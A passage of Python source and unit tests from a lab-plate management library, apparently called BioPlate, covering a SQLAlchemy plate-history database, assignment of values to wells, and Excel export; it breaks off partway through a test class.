{
"source": "jecker7/BioPlate",
"score": 3
}
#### File: BioPlate/database/plate_historic_db.py
```python
import datetime
from sqlalchemy import Column, Integer, String, Date, PickleType
from sqlalchemy.ext.hybrid import hybrid_property
import BioPlate
from BioPlate.database.database import Database
class PlateHist(Database):
class PlateHistoric(Database.Base):
"""
        historic of created plates
"""
__tablename__ = "plate_historic"
__table_args__ = {"useexisting": True}
id = Column(Integer, primary_key=True)
Plate_id = Column(Integer)
numWell = Column(Integer, nullable=False)
date = Column(Date, nullable=False)
plate_name = Column(String(250), unique=True, nullable=False)
plate_array = Column(PickleType, nullable=False)
@hybrid_property
def plate(self):
if isinstance(self.plate_array, list):
return BioPlate.stack.Stack(self.plate_array)
else:
return self.plate_array
def __str__(self):
return (
"<plate N°"
+ str(self.id)
+ ": "
+ self.plate_name
+ ", "
+ str(self.numWell)
+ " wells, "
+ str(self.date)
+ ">"
)
        __repr__ = __str__  # repr and str share the same format
def __init__(self, db_name="plate_historic.db"):
self.db_name = db_name
super().__init__(self.PlateHistoric, db_name)
def add_hplate(self, numWell, plate_name, plate_array, Plate_id=None):
"""
:param Plate_id: id of plate in plate.db
:param numWell: int, number of well in plate
        :param date: date when the plate was created (set automatically to today's date)
        :param plate_name: name of experiment or plate
        :param plate_array: numpy array representation of the plate
        :return: success message (str) if a new entry was added, otherwise the id of the existing entry
"""
already_exist = self.session.query(self.database_class).filter_by(
Plate_id=Plate_id,
numWell=numWell,
date=self.date_now,
plate_name=plate_name,
)
if not already_exist.count():
new_entry = self.database_class(
Plate_id=Plate_id,
numWell=numWell,
date=self.date_now,
plate_name=plate_name,
plate_array=plate_array,
)
self.session.add(new_entry)
self.session.commit()
self.session.close()
Type = type(plate_array).__name__
Type = "Stack" if Type == "list" else Type
return f"{Type} {plate_name} with {numWell} wells was successfully added to database {self.db_name}"
else:
return already_exist[0].id
def update_hplate(self, dict_update, args, key="numWell"):
return super().update(dict_update, args, key=key)
def delete_hplate(self, args, key="numWell"):
return super().delete(args, key=key)
def get_one_hplate(self, args, key="numWell"):
return super().get_one(args, key=key)
def get_hplate(self, **kwargs):
return super().get(**kwargs)
def get_all_hplate(self):
return super().get_all()
@property
def date_now(self):
date = datetime.datetime.now()
return datetime.date(date.year, date.month, date.day)
```
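For orientation, here is a minimal usage sketch of the class above; the database file name and plate values are illustrative, not part of the original source.
```python
import numpy as np
from BioPlate.database.plate_historic_db import PlateHist

# Illustrative database name; any picklable array-like works as plate_array.
phi = PlateHist(db_name="example_historic.db")
plate = np.zeros((8, 12), dtype=object)

# add_hplate returns a success message on first insert,
# or the id of the already existing entry on a duplicate.
print(phi.add_hplate(96, "experiment 1", plate))
print(phi.get_all_hplate())  # [<plate N°1: experiment 1, 96 wells, ...>]
```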
#### File: BioPlate/BioPlate/manipulation.py
```python
from typing import (
Dict,
List,
Tuple,
Optional,
Union,
Any,
overload,
Sequence,
Generator,
)
from collections.abc import Iterable
import numpy as np
import numpy.core.defchararray as ncd
from tabulate import tabulate
from BioPlate.count import BioPlateCount
from BioPlate.database.plate_historic_db import PlateHist
from BioPlate.iterate import BioPlateIterate
from BioPlate.matrix import BioPlateMatrix
class BioPlateManipulation:
"""This parent class grouped all method that can be applied to BioPlate instance.
"""
    def __getitem__(self, index):  # pragma: no cover
        # Placeholder: concrete plate classes supply their own item access.
        return self[index]
    def __setitem__(self, index, value):  # pragma: no cover
        # Placeholder: concrete plate classes supply their own item assignment.
        self[index] = value
@property
def name(self: "BioPlateManipulation") -> str:
"""
Get object name (BioPlate, Inserts, Array)
Returns
-------
name : str
name of instance
Examples
---------
>>> from BioPlate import BioPlate
>>> plate = BioPlate(12, 8)
>>> plate.name
BioPlate
"""
return type(self).__name__
@overload
def _args_analyse(
self: "BioPlateManipulation", well: Dict[str, Any], value: None
) -> Tuple[Dict[str, Any], None]: # pragma: no cover
pass
@overload
def _args_analyse(
self: "BioPlateManipulation", well: Dict[str, Any]
) -> Tuple[Dict[str, Any], None]: # pragma: no cover
pass
@overload
def _args_analyse(
self: "BioPlateManipulation",
well: str,
value: List[Any],
) -> Tuple[str, Union[str, int, float, List[Any], None]]: # pragma: no cover
pass
@overload
def _args_analyse(
self: "BioPlateManipulation",
well: str,
value: Union[str, int, float, List[Any], None],
) -> Tuple[str, Union[str, int, float, List[Any], None]]: # pragma: no cover
pass
def _args_analyse(self, *args):
"""
Parameters
----------
well : dict or str
stand alone args with value for each well
value : list or str or int or float
list of value or value alone
Returns
-------
well : dict or str
well position
        value : list or str or int or float or None
            value for the given well; None if a dict was passed as argument
Examples
----------
>>> BioPlateManipulation._args_analyse({"A1" : "test"})
({"A1" : "test"}, None)
>>> BioPlateManipulation._args_analyse("A[1-2]", ["test", "test1"])
("A[1-2]", ["test", "test1"])
"""
if len(args) == 1:
well, *trash = args
value = None
return well, value
if len(args) == 2:
well, value, *trash = args
return well, value
@overload
def set(
self: "BioPlateManipulation", well: Dict[str, Any], value: None
) -> Union["BioPlateManipulation", str]: # pragma: no cover
pass
@overload
def set(
self: "BioPlateManipulation", well: Dict[str, Any]
) -> Union["BioPlateManipulation", str]: # pragma: no cover
pass
@overload
def set(
self: "BioPlateManipulation",
well: str,
value: Union[str, int, float, List[Any], None],
) -> Union["BioPlateManipulation", str]: # pragma: no cover
pass
def set(self, *args, merge=False):
"""Main entry point to assign value on plate
Parameters
----------
well : dict or str
            - if dict, well must contain a well identifier as key and the value to assign as value, e.g. {"A2" : "value", "A[3-6]" : 42}
            - if string, well is only a well identifier, e.g. "G5"
        value : list or str or int or float
            - if list, value should be paired with a multiple-well identifier, e.g. "B-D[2-5]", ["value1", "value2", "value3"]
        merge : bool (by default False)
            values already on a well are not overridden but appended to
Returns
-------
BioPlate : BioPlate
return instance of plate
        Examples
--------
see :ref:`Set-values-on-plate`
"""
well, value = self._args_analyse(*args)
if not isinstance(well, str) and isinstance(well, Iterable):
generator = well.items() if isinstance(well, dict) else well
for key, val in generator:
if merge:
self.set(key, val, merge=True)
else:
self.set(key, val)
return self
well = BioPlateMatrix(str(well))
if isinstance(value, list):
plate_shape = self[well.row, well.column].shape
len_plate_shape = len(plate_shape)
if len_plate_shape > 1:
if well.pos == "R":
resh_val = np.reshape(value, (plate_shape[0], 1))
else:
resh_val = value
if merge:
self[well.row, well.column] = ncd.add(
self[well.row, well.column], resh_val
)
return self
self[well.row, well.column] = resh_val
return self
else:
if merge:
self[well.row, well.column][: len(value)] = ncd.add(
self[well.row, well.column][: len(value)], value
)
return self
self[well.row, well.column][: len(value)] = value
return self
if merge:
self[well.row, well.column] = ncd.add(self[well.row, well.column], value)
return self
self[well.row, well.column] = value
return self
def get(
self: "BioPlateManipulation", *well: str
) -> Union[List[str], Optional["BioPlateManipulation"], List[Sequence[Any]]]:
"""
        Used to retrieve information from a BioPlate instance
Parameters
----------
well : str
well is only a well identifier eg : "G5", "2[B-G]"
Returns
-------
        One_well : str
            value contained in a single well, e.g. "G5"
        multiple_well : np.array
            all values for a well range, e.g. "2[B-G]"
        multiple_well_multiple_identifier : list
            a list of results, one for each given argument
"""
if len(well) > 1:
querry = list()
for w in well:
result = self[w]
if isinstance(result, str):
querry.append(result)
else:
querry.append(result.tolist())
return querry
else:
return self[str(well[0])]
def save(self: "BioPlateManipulation", plate_name: str, **kwargs) -> Optional[str]:
"""
        Save BioPlate object to the plate historic database
        Parameters
        ----------
        plate_name : str
            name of plate to save in database, e.g. "experiment 1"
kwargs : dict
To know kwargs see :func:`~BioPlate.database.plate_historic_db.PlateHist.add_hplate`
Returns
-------
response : str
database response for adding or updating plate historic database
"""
dbName = kwargs.get("db_hist_name")
if not dbName:
phi = PlateHist()
else:
phi = PlateHist(db_name=dbName)
well = next(BioPlateIterate(self, OnlyValue=True)).shape
numWell = well[0] * well[1]
response = phi.add_hplate(numWell, plate_name, self)
if isinstance(response, str):
return response
else:
dict_update = {"plate_name": plate_name, "plate_array": self}
return phi.update_hplate(dict_update, response, key="id")
def table(
self: "BioPlateManipulation", headers: str = "firstrow", **kwargs
) -> tabulate:
"""
Transform BioPlate object to table
Parameters
----------
headers : str (by default "firstrow")
kwargs : dict
To know kwargs see `Tabulate <https://pypi.org/project/tabulate/#description>`_
Returns
-------
table : str
outputs a nicely formatted plain-text table
"""
return tabulate(self, headers=headers, **kwargs)
def iterate(
self: "BioPlateManipulation", order: str = "C", accumulate: bool = True
) -> Generator:
"""
        Generator to iterate over a BioPlate instance by column or row, with the ability to group values of the same well
Parameters
----------
order : { 'C', 'R'}
Iterate by column (C) or by row (R)
accumulate : bool (by default True)
Group data of same well together
Yields
-------
well : tuple
each iteration contain well identifier and value(s) eg : ("B2", "value")
"""
yield from BioPlateIterate(self, order=order, accumulate=accumulate)
def count(self: "BioPlateManipulation", reverse: bool = False):
"""
        Count the number of occurrences of each value in the BioPlate instance
        Parameters
        ----------
        reverse : bool (by default False)
        Returns
        -------
        result : dict
            a dict mapping each value to its number of occurrences
"""
return BioPlateCount(self, reverse=reverse)
def to_excel(
self: "BioPlateManipulation",
file_name: str,
sheets: List[str] = ["plate_representation", "plate_data", "plate_count"],
header: bool = True,
accumulate: bool = True,
order: str = "C",
empty: str = "empty",
):
"""
Send BioPlate instance to spreadsheet
Parameters
----------
file_name : str
            name of the newly created spreadsheet
sheets : list[str]
name of sheets
header : bool (default is True)
if header should be present in plate representation
accumulate : bool (default is True)
            If data in the BioPlate object should be accumulated or not; see :func:`~BioPlate.Manipulation.BioPlateManipulation.iterate`
order : {"C", "R"}
Iterate value by column or row
empty : str
            value assigned to empty wells
        Returns
        -------
        spreadsheet : None
            creates a spreadsheet at the given file name (may include a path)
"""
from BioPlate.writer.to_excel import BioPlateToExcel
xls_file = BioPlateToExcel(
file_name,
sheets=sheets,
header=header,
accumulate=accumulate,
order=order,
empty=empty,
test=False,
)
xls_file.representation(self)
xls_file.data(self)
xls_file.count(self)
xls_file.close()
```
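Taken together, the methods above support a small workflow like the following sketch; the well ranges and values are illustrative, and `BioPlate(12, 8)` follows the constructor used in the docstring examples.
```python
from BioPlate import BioPlate

plate = BioPlate(12, 8)                       # 12 columns, 8 rows
plate.set({"A2": "control", "B[2-4]": 42})    # dict form: identifier -> value
plate.set("A[3-4]", ["s1", "s2"])             # range form: one value per well

print(plate.get("A2"))                        # value of a single well
print(plate.table(tablefmt="plain"))          # plain-text layout via tabulate
for well, value in plate.iterate(order="R"):  # row-wise (well, value) pairs
    pass
print(plate.count())                          # {value: number of occurrences}
```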
#### File: BioPlate/writer/to_excel.py
```python
from io import BytesIO
import xlsxwriter
from BioPlate import BioPlate
from BioPlate.inserts import Inserts
from BioPlate.stack import Stack
from BioPlate.plate import Plate
class BioPlateToExcel:
"""Past BioPlate object to excel file.
"""
def __init__(
self,
file_name,
sheets=["plate_representation", "plate_data", "plate_count"],
header=True,
accumulate=True,
order="C",
empty="empty",
test=False,
):
"""This class is instentiate with parameters for excel file. BioPlate object are only pass to method.
Parameters
----------------
file_name: str
name of excel file
sheets: List[str]
list of sheetname (default is ["plate_representation", "plate_data", "plate_count"])
        header: bool
            whether headers should be written
        accumulate: bool
            whether plate data should be accumulated per well or listed
        order: str, {"R", "C"}
            whether iteration is done by column or by row
        empty: str
            name given to wells without a value
        test : bool
            for testing purposes; keeps the workbook in memory
"""
self.fileName = file_name
self.sheets = sheets
self.last_row_representation = 0
self.test = test
self.output = BytesIO() if test else None
self.header = header
self.accumulate = accumulate
self.order = order
self.empty = empty
try:
self.workbook = self.open_excel_file
self.plate_rep, self.plate_data, self.plate_count = self.select_worksheet
self.hd_format_representation = self.workbook.add_format(
{"bold": True, "align": "center", "valign": "vcenter"}
)
self.hd_format_inserts = self.workbook.add_format(
{
"bold": True,
"font_color": "red",
"align": "center",
"valign": "vcenter",
}
)
except Exception as e:
raise e
@property
def open_excel_file(self):
"""Create a ``xlsxwriter Workbook`` to work with. If test is ``True`` when class is instenciate this function will return a in `memory Workbook`_.
.. _memory Workbook: https://xlsxwriter.readthedocs.io/workbook.html
.. _`xlsxwriter.Workbook`: https://xlsxwriter.readthedocs.io/workbook.html
Returns
-----------
Workbook : `xlsxwriter.Workbook`_
An object to write excel file
"""
if self.test:
return xlsxwriter.Workbook(self.output, {"in_memory": True})
return xlsxwriter.Workbook(self.fileName)
@property
def select_worksheet(self):
"""Create worksheets object for each sheets given.
Returns
-----------
worksheets : List[xlsxwriter.worksheets]
Return a list of `worksheets`_
.. _worksheets: https://xlsxwriter.readthedocs.io/worksheet.html#worksheet
"""
worksheets = list()
for sheet in self.sheets:
ws = self.workbook.add_worksheet(sheet)
worksheets.append(ws)
return worksheets
def close(self):
"""Close workbook properly
"""
self.workbook.close()
def get_test(self):
"""Return list of value stocked in memory of workbook.
Returns
---------
values : Dict[str, List[List]]
returns values passed to workbook as dict with sheetnames as key and value as list of values.
"""
try:
return self.output.getvalue()
except AttributeError:
return None
def __header_format_representation(self, format):
"""Function to pass heqdwr format representation to workbook object
Parameters
---------------
format : Dict
Dict of format to apply to plate header following xlswriter rules
"""
self.plate_rep.set_row(self.last_row_representation, None, format)
self.plate_rep.set_column(0, 0, None, format)
def representation(self, BPlate):
"""This function put reprenstation of BPlate depending on is type (Plate, Inserts, Stack)
Parameters
--------------
BPlate : BioPlate
            BioPlate object to represent in the spreadsheet
"""
if isinstance(BPlate, Plate):
self._representation(BPlate)
elif isinstance(BPlate, Stack):
for plate in BPlate:
if isinstance(plate, Plate):
self._representation(plate)
elif isinstance(plate, Inserts):
self._representation_inserts(plate)
elif isinstance(BPlate, Inserts):
self._representation_inserts(BPlate)
def _representation(self, plate):
"""Pass Plate representation to spreadsheet
Parameters
--------------
plate : Plate
Plate object to represent
"""
        self.__header_format_representation(self.hd_format_representation)
plate = self.plate_split(plate)
for row, value in enumerate(plate, self.last_row_representation):
self.plate_rep.write_row(row, 0, value)
self.last_row_representation += len(plate) + 1
def _representation_inserts(self, BPlate):
"""Pass Inserts representation to spreadsheet
Parameters
--------------
BPlate : Inserts
Inserts object to represent
"""
position = ["TOP", "BOT"]
for pos, plate_part in zip(position, BPlate):
rm = self.last_row_representation
self._representation(plate_part)
if self.header:
self.plate_rep.write(rm, 0, pos, self.hd_format_inserts)
def plate_split(self, plate):
"""
        Remove the header row and column when headers are disabled.
"""
if self.header:
return plate
else:
return plate[1:, 1:]
def data(self, BPlate, accumulate=None, order=None, header=None):
"""
        Add plate data to the worksheet: wells and their values in columns, ordered by column or row. If accumulated, each well is written only once.
        header, if given, should be a list of column names.
"""
order = self.order if order is None else order
accumulate = self.accumulate if accumulate is None else accumulate
if isinstance(BPlate, Inserts) or isinstance(
BPlate[0], Inserts
):
self._data(
BPlate, accumulate=accumulate, order=order, inserts=True, header=header
)
else:
self._data(BPlate, accumulate=accumulate, order=order, header=header)
def _data(self, BPlate, accumulate=True, order="C", header=None, inserts=False):
for row, value in enumerate(
BPlate.iterate(accumulate=accumulate, order=order), 1
):
self.plate_data.write_row(row, 0, value)
len_column = len(value) - 1
if not inserts:
hd = self.__header_data_BP(len_column, accumulate=accumulate)
else:
hd = self.__header_data_Inserts(len_column, accumulate=accumulate)
head = hd if header is None else header
self.plate_data.write_row(0, 0, head)
def __header_data_BP(self, len_column, accumulate=True):
hd = ["well"]
Add = lambda n: "value" + str(n) if accumulate else "value"
header = list(map(Add, range(len_column)))
hd = hd + header
return hd
def __header_data_Inserts(self, len_column, accumulate=True):
len_column = len_column // 2
hd = ["well"]
if accumulate:
header = []
for n in range(len_column):
header += ["top" + str(n), "bot" + str(n)]
else:
header = ["top", "bot"]
hd = hd + header
return hd
def count(self, BPlate):
self._count(BPlate)
def _count(self, BPlate):
for row, V in self.__count(BPlate):
self.plate_count.write_row(row, 0, V)
self._header_count(len(V), Inserts=isinstance(BPlate, Inserts))
def __count(self, BPlate):
row = 0
for keys, values in BPlate.count().items():
if not isinstance(values, dict):
keys = keys if keys != "" else self.empty
V = [keys, values]
row += 1
yield row, V
else:
for key, value in values.items():
if not isinstance(value, dict):
key = key if key != "" else self.empty
V = [keys, key, value]
row += 1
yield row, V
else:
for k, v in value.items():
k = k if k != "" else self.empty
V = [keys, key, k, v]
row += 1
yield row, V
def _header_count(self, len_header, Inserts=False):
if len_header == 2:
hd = ["infos", "count"]
elif len_header == 3:
if not Inserts:
hd = ["plate", "infos", "count"]
else:
hd = ["position", "infos", "count"]
elif len_header == 4:
hd = ["plate", "position", "infos", "count"]
self.plate_count.write_row(0, 0, hd)
```
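The writer is driven in the same sequence as `BioPlateManipulation.to_excel` above; a sketch using the in-memory `test=True` mode (plate construction is illustrative):
```python
from BioPlate import BioPlate
from BioPlate.writer.to_excel import BioPlateToExcel

plate = BioPlate(12, 8)
plate.set("A1", "sample")

writer = BioPlateToExcel("plates.xlsx", test=True)  # in-memory workbook
writer.representation(plate)   # plate layout sheet
writer.data(plate)             # well/value columns sheet
writer.count(plate)            # occurrence counts sheet
writer.close()
print(len(writer.get_test()))  # raw xlsx bytes kept in memory
```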
#### File: BioPlate/tests/test_manipulation.py
```python
import unittest
from BioPlate.manipulation import BioPlateManipulation
class TestBioPlateManipulation(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""
This function is run one time at the beginning of tests
:return:
"""
pass
@classmethod
def tearDownClass(cls):
"""
This function is run one time at the end of tests
:return:
"""
pass
def setUp(self):
"""
This function is run every time at the beginning of each test
:return:
"""
self.BPM = BioPlateManipulation()
def tearDown(self):
"""
This function is run every time at the end of each test
:return:
"""
pass
# def test_add_values(self):
# self.assertEqual(
# self.BPM._add_values({"A": {3: 5}}), "{'A': {3: 5}} have a wrong format"
# )
def test_args_analysis(self):
self.assertEqual(self.BPM._args_analyse(12, ["bob1", "bob2"]), (12, ["bob1", "bob2"]))
self.assertEqual(self.BPM._args_analyse({"test" : 12}), ({"test" : 12}, None))
self.assertEqual( self.BPM._args_analyse("A[2-3]", ["Bob", "Marc"]), ("A[2-3]", ["Bob", "Marc"]))
if __name__ == "__main__":
unittest.main()
```
#### File: BioPlate/tests/test_plate_historic_db.py
```python
import unittest
from BioPlate.database.plate_historic_db import PlateHist
from BioPlate.database.plate_db import PlateDB
from BioPlate import BioPlate
from pathlib import Path, PurePath
import contextlib
import numpy as np
import datetime
class TestPlateDB(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""
This function is run one time at the beginning of tests
:return:
"""
cls.pdb = PlateDB(db_name="test_plate.db")
cls.pdb.add_plate(
numWell=96,
numColumns=12,
numRows=8,
surfWell=0.29,
maxVolWell=200,
workVolWell=200,
refURL="https://csmedia2.corning.com/LifeSciences/Media/pdf/cc_surface_areas.pdf",
)
v = {
"A[2,8]": "VC",
"H[2,8]": "MS",
"1-4[B,G]": ["MLR", "NT", "1.1", "1.2"],
"E-G[8,10]": ["Val1", "Val2", "Val3"],
}
cls.plt = BioPlate({"id": 1}, db_name="test_plate.db")
cls.plt.set(v)
cls.phi = PlateHist(db_name="test_plate_historic.db")
cls.phi.add_hplate(
Plate_id=1,
numWell=96,
plate_name="First plate to test",
plate_array=cls.plt,
)
dt = datetime.datetime.now()
cls.date = datetime.date(dt.year, dt.month, dt.day)
@classmethod
def tearDownClass(cls):
"""
This function is run one time at the end of tests
:return:
"""
with contextlib.suppress(FileNotFoundError):
Path(
PurePath(
Path(__file__).parent.parent,
"BioPlate/database/DBFiles",
"test_plate.db",
)
).unlink()
Path(
PurePath(
Path(__file__).parent.parent,
"BioPlate/database/DBFiles",
"test_plate_historic.db",
)
).unlink()
def setUp(self):
"""
This function is run every time at the beginning of each test
:return:
"""
self.plate_list = self.phi.get_hplate(numWell=96)
self.plate = self.plate_list[0]
def tearDown(self):
"""
This function is run every time at the end of each test
:return:
"""
pass
def test_get_hplate(self):
self.assertIsInstance(
self.plate_list, list, "plate_db.get_plate don't return a list"
)
self.assertEqual(
f"<plate N°1: First plate to test, 96 wells, {self.phi.date_now}>",
str(self.plate),
"plate_db.get_plate don't return the appropriate format",
)
self.assertTrue(
str(type(self.plate))
== "<class 'BioPlate.database.plate_historic_db.PlateHist.PlateHistoric'>",
f"plate_db.get_plate don't return the right class : {str(type(self.plate))}",
)
def test_plate_class(self):
self.assertEqual(self.plate.numWell, 96, "Error numWell association fail")
self.assertEqual(
self.plate.plate_name,
"First plate to test",
"Error numColumns association fail",
)
np.testing.assert_array_equal(self.plate.plate_array, self.plt)
def test_add_hplate(self):
add_plate_1 = self.pdb.add_plate(
numWell=6,
numColumns=3,
numRows=2,
surfWell=9.5,
maxVolWell=2000,
workVolWell=2000,
refURL="https://csmedia2.corning.com/LifeSciences/Media/pdf/cc_surface_areas.pdf",
)
p6 = self.pdb.get_one_plate(6)
Plate6 = BioPlate({"numWell": 6}, db_name="test_plate.db")
add_hplate_1 = self.phi.add_hplate(
Plate_id=2, numWell=6, plate_name="second plate", plate_array=Plate6
)
add_hplate_2 = self.phi.add_hplate(
Plate_id=2, numWell=6, plate_name="second plate", plate_array=Plate6
)
self.assertEqual(
add_hplate_1,
"Plate second plate with 6 wells was successfully added to database test_plate_historic.db",
)
self.assertEqual(add_hplate_2, 2)
self.assertEqual(
f"<plate N°2: second plate, 6 wells, {self.phi.date_now}>",
str(self.phi.get_one_hplate(6)),
)
self.assertEqual(6, self.phi.get_hplate(numWell=6)[0].numWell)
def test_delete_hplate(self):
self.assertEqual(self.phi.delete_hplate(6), "plate with 6 numWell deleted")
self.assertEqual(self.phi.get_hplate(numWell=6), [])
def test_repr(self):
Pl = self.phi.get_one(1, key="id")
self.assertEqual(repr(Pl), f"<plate N°1: First plate to test, 96 wells, {self.date}>")
def test_get_all(self):
self.assertEqual(str(self.phi.get_all_hplate()), f"[<plate N°1: First plate to test, 96 wells, {self.date}>]")
def test_stack(self):
pl1 = BioPlate(12, 8)
pl2 = BioPlate(12, 8)
pl1.set("A2", "bob")
self.phi.add_hplate(
Plate_id=2, numWell=96, plate_name="stack", plate_array=[pl1, pl2]
)
Pl = self.phi.get_one(2, key="id").plate
self.assertEqual(Pl.name, "Stack")
self.assertEqual(Pl.get(0, "A2"), "bob")
if __name__ == "__main__":
unittest.main()
```
#### File: BioPlate/tests/test_plate_to_excel.py
```python
import unittest
import contextlib
import numpy as np
from pathlib import Path, PurePath
from pyexcel_xlsx import get_data
from BioPlate import BioPlate
from BioPlate.writer.to_excel import BioPlateToExcel
from BioPlate.database.plate_db import PlateDB
from BioPlate.database.plate_historic_db import PlateHist
from string import ascii_uppercase
from tabulate import tabulate
def remove_tail(liste):
lis = liste[::-1]
for i, val in enumerate(lis):
if not val:
del lis[i]
liste = lis[::-1]
return remove_tail(liste)
else:
return liste
def remove_np_tail(liste):
lis = liste[::-1]
isempty = np.vectorize(any)
for i, val in enumerate(lis):
if val.any():
del lis[i]
liste = lis[::-1]
return remove_np_tail(liste)
else:
return liste
def like_read_excel(plate, header=True, lst=None):
rm_empty = [] if lst is None else lst
if plate.name == "Plate":
return clean_list(rm_empty, plate, header=header)
elif plate.name == "Inserts":
n = 0
for parts in plate:
parts = parts if header else parts[1:, 1:]
u = len(parts)
for part in parts:
if header:
if n == 0:
part[0] = "TOP"
elif u == n:
part[0] = "BOT"
if u == n:
rm_empty.append([])
clean_list(rm_empty, part, parts=True)
n += 1
return rm_empty
def like_read_excel_stack(stack, header=True):
ll = None
for plate in stack:
if ll is None:
ll = like_read_excel(plate, header=header, lst=None)
else:
ll = like_read_excel(plate, header=header, lst=ll)
ll.append([])
del ll[-1]
return ll
def clean_list(li, plate, parts=False, header=True):
if not parts:
plate = plate if header else plate[1:, 1:]
for x in plate:
li.append(remove_tail(list(x)))
else:
li.append(remove_tail(list(plate)))
return li
def as_read_excel(PTE, action, plate, filename, sheetname, conditions=None):
if conditions:
for attr, value in conditions.items():
setattr(PTE, attr, value)
getattr(PTE, action)(plate)
getattr(PTE, "close")()
return get_data(filename)[sheetname]
def like_read_data(plate, accumulate=True, order="C", header=None, stack=False):
rm_empty = list(
map(list, getattr(plate, "iterate")(accumulate=accumulate, order=order))
)
if header is not None:
pass
else:
val = len(rm_empty[0])
if plate.name == "Plate":
header = ["well", "value0"]
elif plate.name == "Inserts":
if accumulate:
header = ["well", "top0", "bot0"]
else:
header = ["well", "top", "bot"]
if val <= 2:
pass
else:
if plate.name == "Inserts":
pass
# if val <= 3:
# for i in range(1, val):
# header.append('top' + str(i))
# header.append('bot' + str(i))
elif plate.name == "BioPlate":
for i in range(1, val):
header.append("value" + str(i))
if not stack:
rm_empty.insert(0, header)
return list(map(remove_tail, rm_empty))
def like_read_data_stack(stack, accumulate=True, order="C", header=None):
if stack[0].name == "Plate":
if accumulate:
header = ["well", "value0"]
else:
header = ["well", "value"]
elif stack[0].name == "Inserts":
if accumulate:
header = ["well", "top0", "bot0"]
else:
header = ["well", "top", "bot"]
if accumulate:
for i in range(1, len(stack)):
if stack[0].name == "Inserts":
header.append("top" + str(i))
header.append("bot" + str(i))
else:
header.append("value" + str(i))
rm_empty = list(
map(list, getattr(stack, "iterate")(accumulate=accumulate, order=order))
)
rm_empty.insert(0, header)
return list(map(remove_tail, rm_empty))
def like_read_count(plate, empty="empty", Inserts=False):
val = list(plate.count().items())
if isinstance(val[0][1], dict):
nv = []
for pos, valdict in val:
valdict = list(map(list, valdict.items()))
addp = lambda x: [pos] + x
nv += list(map(addp, valdict))
val = nv
if isinstance(val[0][2], dict):
nv = []
for i in range(len(val)):
num, pos, valdict = val[i]
valdict = list(map(list, valdict.items()))
addp = lambda x: [num, pos] + x
nv += list(map(addp, valdict))
val = nv
val = list(map(list, val))
change = lambda x: empty if x == "" else x
val = list(map(lambda y: list(map(change, y)), val))
len_header = len(val[0])
if len_header == 2:
hd = ["infos", "count"]
elif len_header == 3:
if not Inserts:
hd = ["plate", "infos", "count"]
else:
hd = ["position", "infos", "count"]
elif len_header == 4:
hd = ["plate", "position", "infos", "count"]
val.insert(0, hd)
return val
def nested_dict_to_list(dd):
local_list = []
for key, value in dd.items():
local_list.append(key)
local_list.extend(nested_dict_to_list(value))
return local_list
class TestPlateToExcel(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""
This function is run one time at the beginning of tests
:return:
"""
cls.pdb = PlateDB(db_name="test_plate.db")
cls.pdb.add_plate(
numWell=96,
numColumns=12,
numRows=8,
surfWell=0.29,
maxVolWell=200,
workVolWell=200,
refURL="https://csmedia2.corning.com/LifeSciences/Media/pdf/cc_surface_areas.pdf",
)
@classmethod
def tearDownClass(cls):
"""
This function is run one time at the end of tests
:return:
"""
with contextlib.suppress(FileNotFoundError):
Path(
PurePath(
Path(__file__).parent.parent
/ "BioPlate/database/DBFiles"
/ "test_plate.db"
)
).unlink()
Path(
PurePath(
Path(__file__).parent.parent
/ "BioPlate/database/DBFiles"
/ "test_plate_historic.db"
)
).unlink()
Path(
PurePath(
Path(__file__).parent.parent
/ "BioPlate/database/DBFiles"
/ "test_plate_to_excel.xlsx"
)
).unlink()
def setUp(self):
"""
This function is run every time at the beginning of each test
:return:
"""
self.PTE = BioPlateToExcel("test.xlsx")
v = {
"A[2,8]": "VC",
"H[2,8]": "MS",
"1-4[B,G]": ["MLR", "NT", "1.1", "1.2"],
"E-G[8,10]": ["Val1", "Val2", "Val3"],
}
v1 = {
"A[2,8]": "VC1",
"H[2,8]": "MS1",
"1-4[B,G]": ["MLR1", "NT1", "1.3", "1.4"],
"E-G[8,10]": ["Val4", "Val5", "Val6"],
}
v2 = {
"A[2,8]": "Top",
"H[2,8]": "MS",
"1-4[B,G]": ["MLR", "NT", "1.1", "1.2"],
"E-G[8,10]": ["Val1", "Val2", "Val3"],
}
v3 = {
"A[2,8]": "Bot",
"H[2,8]": "MS1",
"1-4[B,G]": ["MLR1", "NT1", "1.3", "1.4"],
"E-G[8,10]": ["Val4", "Val5", "Val6"],
}
self.plt = BioPlate({"id": 1}, db_name="test_plate.db")
self.plt.set(v)
self.plt1 = BioPlate(12, 8)
self.plt1.set(v1)
self.stack = self.plt + self.plt1
self.Inserts = BioPlate(12, 8, inserts=True)
self.Inserts.top.set(v)
self.Inserts.bot.set(v3)
self.Inserts1 = BioPlate(12, 8, inserts=True)
self.Inserts1.bot.set(v1)
self.Inserts1.top.set(v2)
self.stacki = self.Inserts + self.Inserts1
def tearDown(self):
"""
This function is run every time at the end of each test
:return:
"""
with contextlib.suppress(FileNotFoundError):
Path(PurePath("test.xlsx")).unlink()
    ###TEST REPRESENTATION SHEET
def test_representation_BioPlate(self):
read_excel = as_read_excel(
self.PTE, "representation", self.plt, "test.xlsx", "plate_representation"
)
rm_empty = like_read_excel(self.plt)
self.assertEqual(read_excel, rm_empty)
def test_representation_BioPlate_hd(self):
c = {"header": False}
read_excel = as_read_excel(
self.PTE,
"representation",
self.plt,
"test.xlsx",
"plate_representation",
conditions=c,
)
rm_empty = like_read_excel(self.plt, header=False)
self.assertEqual(read_excel, rm_empty)
def test_representation_BioPlateInserts(self):
read_excel = as_read_excel(
self.PTE,
"representation",
self.Inserts,
"test.xlsx",
"plate_representation",
)
rm_empty = like_read_excel(self.Inserts)
self.assertEqual(read_excel, rm_empty)
def test_representation_BioPlateInserts_hd(self):
c = {"header": False}
read_excel = as_read_excel(
self.PTE,
"representation",
self.Inserts,
"test.xlsx",
"plate_representation",
conditions=c,
)
rm_empty = like_read_excel(self.Inserts, header=False)
self.assertEqual(read_excel, rm_empty)
def test_representation_BioPlateStack_bp(self):
read_excel = as_read_excel(
self.PTE, "representation", self.stack, "test.xlsx", "plate_representation"
)
rm_empty = like_read_excel_stack(self.stack)
self.assertEqual(read_excel, rm_empty)
def test_representation_BioPlateStack_bp_hd(self):
c = {"header": False}
read_excel = as_read_excel(
self.PTE,
"representation",
self.stack,
"test.xlsx",
"plate_representation",
conditions=c,
)
rm_empty = like_read_excel_stack(self.stack, header=False)
